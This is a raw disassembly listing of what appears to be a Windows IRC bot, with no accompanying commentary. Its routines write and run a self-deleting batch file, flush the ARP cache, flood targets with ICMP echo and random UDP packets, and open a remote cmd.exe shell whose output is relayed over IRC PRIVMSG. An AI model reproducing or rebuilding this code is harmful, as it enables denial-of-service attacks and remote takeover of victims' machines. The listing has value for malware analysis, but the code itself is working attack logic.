var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp ds:dword_42F5C0, esi
push edi
jz short loc_40AC66
cmp ds:dword_43F738, esi
jnz short loc_40AC66
push esi
call sub_40C1AE
pop ecx
loc_40AC66: ; CODE XREF: sub_40AC42+13�j
; sub_40AC42+1B�j
call sub_416F23
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_42412C ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_4172AE
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:off_424084
mov edi, eax
cmp edi, esi
jbe loc_40ADC6
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_4172AE
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_42407C ; WriteFile
push edi
call ds:off_424078
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_417330
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_43C80C
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:off_424100
push eax
call ds:off_424094
lea eax, [ebp+var_15C]
push eax
call ds:off_4240A8
cmp eax, 0FFFFFFFFh
jz short loc_40AD6E
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_424128 ; SetFileAttributesA
loc_40AD6E: ; CODE XREF: sub_40AC42+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_4172AE
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_424124 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_424120 ; CreateProcessA
loc_40ADC6: ; CODE XREF: sub_40AC42+72�j
pop edi
pop esi
leave
retn
sub_40AC42 endp
; =============== S U B R O U T I N E =======================================
sub_40ADCA proc near ; CODE XREF: sub_4013EC+7�p
; sub_401992+7�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_43F6A8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40ADF2
push [esp+arg_0]
call ds:dword_43F6EC ; gethostbyname
test eax, eax
jnz short loc_40ADEB
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ADEB: ; CODE XREF: sub_40ADCA+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40ADF2: ; CODE XREF: sub_40ADCA+D�j
retn
sub_40ADCA endp
; =============== S U B R O U T I N E =======================================
sub_40ADF3 proc near ; CODE XREF: sub_40EB92+D6�p
mov ecx, ds:dword_43F590
xor eax, eax
test ecx, ecx
jz short locret_40AE01
call ecx ; DnsFlushResolverCache
locret_40AE01: ; CODE XREF: sub_40ADF3+A�j
retn
sub_40ADF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE02 proc near ; CODE XREF: sub_40EE72:loc_414554�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call ds:dword_43F6E4 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AEC8
sub ecx, 32h
jz loc_40AEC1
sub ecx, 48h
jz short loc_40AE62
sub ecx, 6Eh
jz short loc_40AE5B
loc_40AE44: ; CODE XREF: sub_40AE02+8B�j
push eax
lea eax, [ebp+var_88]
push offset unk_42DA5C
push eax
call sub_4172AE
add esp, 0Ch
jmp short loc_40AEA2
; ---------------------------------------------------------------------------
loc_40AE5B: ; CODE XREF: sub_40AE02+40�j
push offset unk_42DA28
jmp short loc_40AE94
; ---------------------------------------------------------------------------
loc_40AE62: ; CODE XREF: sub_40AE02+3B�j
push [ebp+var_8]
call sub_417B89
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_417330
add esp, 10h
cmp esi, edi
jz short loc_40AE8F
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call ds:dword_43F6E4 ; GetIpNetTable
cmp eax, edi
jz short loc_40AEC8
jmp short loc_40AE44
; ---------------------------------------------------------------------------
loc_40AE8F: ; CODE XREF: sub_40AE02+79�j
push offset unk_42D9E8
loc_40AE94: ; CODE XREF: sub_40AE02+5E�j
; sub_40AE02+C4�j
lea eax, [ebp+var_88]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_40AEA2: ; CODE XREF: sub_40AE02+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_40BF6D
pop ecx
loc_40AEB2: ; CODE XREF: sub_40AE02+C8�j
; sub_40AE02+DC�j
push esi
call sub_417C3B
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AEC1: ; CODE XREF: sub_40AE02+32�j
push offset unk_42D9A8
jmp short loc_40AE94
; ---------------------------------------------------------------------------
loc_40AEC8: ; CODE XREF: sub_40AE02+29�j
; sub_40AE02+89�j
cmp [esi], edi
jbe short loc_40AEB2
lea ebx, [esi+4]
loc_40AECF: ; CODE XREF: sub_40AE02+DA�j
push ebx
call ds:dword_43F6E0 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AECF
jmp short loc_40AEB2
sub_40AE02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AEE0 proc near ; CODE XREF: sub_40144A+243�p
; sub_401D82+268�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_43F60C ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_43F99C
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_4172AE
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AEE0 endp
; =============== S U B R O U T I N E =======================================
sub_40AF39 proc near ; CODE XREF: sub_4010B5+24C�p
; sub_4010B5+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40AF62
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40AF55: ; CODE XREF: sub_40AF39+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40AF55
pop edi
jmp short loc_40AF66
; ---------------------------------------------------------------------------
loc_40AF62: ; CODE XREF: sub_40AF39+A�j
mov edx, [esp+4+arg_0]
loc_40AF66: ; CODE XREF: sub_40AF39+27�j
test esi, esi
pop esi
jz short loc_40AF70
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40AF70: ; CODE XREF: sub_40AF39+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AF39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF86 proc near ; DATA XREF: sub_40EE72+2E51�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call ds:dword_43F5F4 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call ds:dword_43F6A8 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40AFE1
lea eax, [ebp+var_C0]
push eax
call ds:dword_43F6EC ; gethostbyname
cmp eax, ebx
jz short loc_40AFE7
loc_40AFE1: ; CODE XREF: sub_40AF86+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_40B044
loc_40AFE7: ; CODE XREF: sub_40AF86+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42DAD8
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B027
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40D679
add esp, 14h
loc_40B027: ; CODE XREF: sub_40AF86+7F�j
lea eax, [ebp+var_344]
push eax
call sub_40BF6D
push [ebp+var_30]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_40B044: ; CODE XREF: sub_40AF86+5F�j
cmp eax, ebx
jz short loc_40B054
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40B057
; ---------------------------------------------------------------------------
loc_40B054: ; CODE XREF: sub_40AF86+C0�j
mov [ebp+var_4], esi
loc_40B057: ; CODE XREF: sub_40AF86+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_417330
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_40B077
mov [ebp+var_3C], eax
loc_40B077: ; CODE XREF: sub_40AF86+EC�j
cmp [ebp+var_38], edi
jge short loc_40B07F
mov [ebp+var_38], edi
loc_40B07F: ; CODE XREF: sub_40AF86+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_40B0AC
loc_40B086: ; CODE XREF: sub_40AF86+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call ds:dword_43F58C ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_40B086
loc_40B0AC: ; CODE XREF: sub_40AF86+FE�j
push [ebp+arg_0]
call ds:dword_43F720 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_42DA9C
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B0F5
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40D679
add esp, 14h
loc_40B0F5: ; CODE XREF: sub_40AF86+14D�j
lea eax, [ebp+var_344]
push eax
call sub_40BF6D
push [ebp+var_30]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
sub_40AF86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B112 proc near ; DATA XREF: sub_40EE72+2FA9�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
pop ecx
push 11h
push 2
push 2
call ds:dword_43F6E8 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call ds:dword_43F6A8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40B1F7
lea eax, [ebp+var_B0]
push eax
call ds:dword_43F6EC ; gethostbyname
cmp eax, edi
jnz short loc_40B1F0
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42DB4C
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B1D3
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40D679
add esp, 14h
loc_40B1D3: ; CODE XREF: sub_40B112+9F�j
lea eax, [ebp+var_334]
push eax
call sub_40BF6D
push [ebp+var_20]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_40B1F0: ; CODE XREF: sub_40B112+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_40B1FA
; ---------------------------------------------------------------------------
loc_40B1F7: ; CODE XREF: sub_40B112+6E�j
lea eax, [ebp+arg_0]
loc_40B1FA: ; CODE XREF: sub_40B112+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_40B215
call sub_41730A
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40B218
; ---------------------------------------------------------------------------
loc_40B215: ; CODE XREF: sub_40B112+F0�j
push [ebp+var_24]
loc_40B218: ; CODE XREF: sub_40B112+101�j
call ds:dword_43F668 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_40B22A
mov [ebp+var_24], esi
loc_40B22A: ; CODE XREF: sub_40B112+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_40B237
mov [ebp+var_24], eax
loc_40B237: ; CODE XREF: sub_40B112+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_40B24B
mov [ebp+var_28], esi
loc_40B24B: ; CODE XREF: sub_40B112+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_40B26C
loc_40B252: ; CODE XREF: sub_40B112+158�j
call sub_41730A
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_40B252
loc_40B26C: ; CODE XREF: sub_40B112+13E�j
; sub_40B112+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_40B2CB
push 0Bh
pop esi
loc_40B279: ; CODE XREF: sub_40B112+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_41730A
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call ds:dword_43F6CC ; sendto
push [ebp+var_28]
call ds:dword_424064 ; Sleep
dec esi
jnz short loc_40B279
cmp [ebp+var_24], edi
jnz short loc_40B26C
call sub_41730A
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call ds:dword_43F668 ; htons
mov [ebp+var_E], ax
jmp short loc_40B26C
; ---------------------------------------------------------------------------
loc_40B2CB: ; CODE XREF: sub_40B112+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42DB10
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B30B
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40D679
add esp, 14h
loc_40B30B: ; CODE XREF: sub_40B112+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_40BF6D
push [ebp+var_20]
call sub_417076
pop ecx
pop ecx
push edi
call ds:dword_424054 ; ExitThread
sub_40B112 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B328 proc near ; CODE XREF: sub_40B358+2A�p
; sub_40B390+7E�p ...
mov eax, ds:dword_43F9B4
push esi
mov esi, ds:off_424078
cmp eax, 0FFFFFFFFh
jz short loc_40B33C
push eax
call esi ; sub_49C3D5
loc_40B33C: ; CODE XREF: sub_40B328+F�j
mov eax, ds:dword_43F9BC
cmp eax, 0FFFFFFFFh
jz short loc_40B349
push eax
call esi ; sub_49C3D5
loc_40B349: ; CODE XREF: sub_40B328+1C�j
mov eax, ds:dword_43F9B0
cmp eax, 0FFFFFFFFh
jz short loc_40B356
push eax
call esi ; sub_49C3D5
loc_40B356: ; CODE XREF: sub_40B328+29�j
pop esi
retn
sub_40B328 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B358 proc near ; CODE XREF: sub_40C351+14A�p
; sub_40EE72+4881�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_417AB0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push ds:dword_43F9B8
call ds:dword_42407C ; WriteFile
test eax, eax
jnz short loc_40B38B
call sub_40B328
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B38B: ; CODE XREF: sub_40B358+28�j
push 1
pop eax
leave
retn
sub_40B358 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B390 proc near ; CODE XREF: sub_40B417+D3�p
; sub_40B417+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_43C80C
push [ebp+arg_4]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40B3D3
push 7D0h
call ds:dword_424064 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_4172AE
add esp, 10h
jmp short loc_40B3EA
; ---------------------------------------------------------------------------
loc_40B3D3: ; CODE XREF: sub_40B390+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_3 ; "%s"
push eax
call sub_4172AE
add esp, 0Ch
loc_40B3EA: ; CODE XREF: sub_40B390+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
test eax, eax
jg short loc_40B413
call sub_40B328
loc_40B413: ; CODE XREF: sub_40B390+7C�j
xor eax, eax
leave
retn
sub_40B390 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B417 proc near ; DATA XREF: sub_40B56C+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_43F9C0
loc_40B42F: ; CODE XREF: sub_40B417+79�j
; sub_40B417+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push ds:dword_43F9B4
call ds:dword_424134 ; PeekNamedPipe
test eax, eax
jz loc_40B4FD
cmp [ebp+var_4], edi
jnz short loc_40B492
lea eax, [ebp+var_8]
push eax
push ds:dword_43F9B0
call ds:dword_424130 ; GetExitCodeProcess
test eax, eax
jz short loc_40B488
cmp [ebp+var_8], 103h
jnz loc_40B521
loc_40B488: ; CODE XREF: sub_40B417+62�j
push 0Ah
call ds:dword_424064 ; Sleep
jmp short loc_40B42F
; ---------------------------------------------------------------------------
loc_40B492: ; CODE XREF: sub_40B417+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40B4A9
loc_40B499: ; CODE XREF: sub_40B417+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_40B4F7
inc eax
cmp eax, [ebp+var_4]
jb short loc_40B499
loc_40B4A9: ; CODE XREF: sub_40B417+80�j
mov [ebp+var_4], esi
loc_40B4AC: ; CODE XREF: sub_40B417+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push ds:dword_43F9B4
call ds:off_424074
test eax, eax
jz short loc_40B549
lea eax, [ebp+var_20C]
push eax
push ebx
push ds:dword_43F9F4
call sub_40B390
add esp, 0Ch
jmp loc_40B42F
; ---------------------------------------------------------------------------
loc_40B4F7: ; CODE XREF: sub_40B417+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_40B4AC
; ---------------------------------------------------------------------------
loc_40B4FD: ; CODE XREF: sub_40B417+45�j
push offset dword_42DC0C
push ebx
push ds:dword_43F9F4
call sub_40B390
push [ebp+arg_0]
call sub_417076
add esp, 10h
push 1
call ds:dword_424054 ; ExitThread
loc_40B521: ; CODE XREF: sub_40B417+6B�j
call sub_40B328
push offset dword_42DBD4
push ebx
push ds:dword_43F9F4
call sub_40B390
push [ebp+arg_0]
call sub_417076
add esp, 10h
push edi
call ds:dword_424054 ; ExitThread
loc_40B549: ; CODE XREF: sub_40B417+C3�j
push offset dword_42DB94
push ebx
push ds:dword_43F9F4
call sub_40B390
push [ebp+arg_0]
call sub_417076
add esp, 10h
push edi
call ds:dword_424054 ; ExitThread
sub_40B417 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B56C proc near ; CODE XREF: sub_40C351+99�p
; sub_40EE72+5772�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40B328
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call ds:off_43F724
test eax, eax
jz loc_40B666
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, ds:dword_424140
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_40B666
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_40B666
mov edi, ds:dword_42413C
push 3
push esi
push esi
push offset dword_43F9B8
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_424138 ; DuplicateHandle
test eax, eax
jz short loc_40B666
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_417330
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_43C80C
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_424120 ; CreateProcessA
test eax, eax
jnz short loc_40B66E
loc_40B666: ; CODE XREF: sub_40B56C+2F�j
; sub_40B56C+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_40B71C
; ---------------------------------------------------------------------------
loc_40B66E: ; CODE XREF: sub_40B56C+F8�j
push [ebp+var_4]
mov edi, ds:off_424078
call edi ; sub_49C3D5
mov eax, [ebp+var_10]
push [ebp+var_28]
mov ds:dword_43F9B4, eax
mov eax, [ebp+var_8]
mov ds:dword_43F9BC, eax
mov eax, [ebp+var_2C]
mov ds:dword_43F9B0, eax
call edi ; sub_49C3D5
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov ds:dword_43F9F4, eax
jz short loc_40B6A8
push [ebp+arg_4]
jmp short loc_40B6A9
; ---------------------------------------------------------------------------
loc_40B6A8: ; CODE XREF: sub_40B56C+135�j
push ebx
loc_40B6A9: ; CODE XREF: sub_40B56C+13A�j
push offset dword_43F9C0
call sub_4172AE
pop ecx
pop ecx
push esi
push 7
push offset dword_42DC90
call sub_416D5A
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov ds:dword_4450C8[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40B417
push esi
push esi
call ds:dword_4240A0 ; CreateThread
cmp eax, esi
mov ds:dword_4450D4[edi], eax
jnz short loc_40B71A
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset dword_42DC4C
push eax
call sub_4172AE
lea eax, [ebp+var_378]
push eax
call sub_40BF6D
add esp, 10h
loc_40B71A: ; CODE XREF: sub_40B56C+185�j
xor eax, eax
loc_40B71C: ; CODE XREF: sub_40B56C+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B56C endp
; =============== S U B R O U T I N E =======================================
sub_40B721 proc near ; CODE XREF: sub_407110+74�p
; sub_40B8D8+217�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_424058 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_43F9FC
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_41782A
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40B721 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B78A proc near ; CODE XREF: sub_409037+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_424144 ; GetVersionExA
test eax, eax
jz short loc_40B81D
cmp [ebp+var_90], 4
jnz short loc_40B7F3
cmp [ebp+var_8C], esi
jnz short loc_40B7DB
cmp [ebp+var_84], 1
jnz short loc_40B7CE
push 1
pop esi
loc_40B7CE: ; CODE XREF: sub_40B78A+3F�j
cmp [ebp+var_84], 2
jnz short loc_40B81D
push 1
jmp short loc_40B81C
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40B78A+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_40B7E8
loc_40B7E4: ; CODE XREF: sub_40B78A+78�j
push 2
jmp short loc_40B81C
; ---------------------------------------------------------------------------
loc_40B7E8: ; CODE XREF: sub_40B78A+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_40B81D
jmp short loc_40B80D
; ---------------------------------------------------------------------------
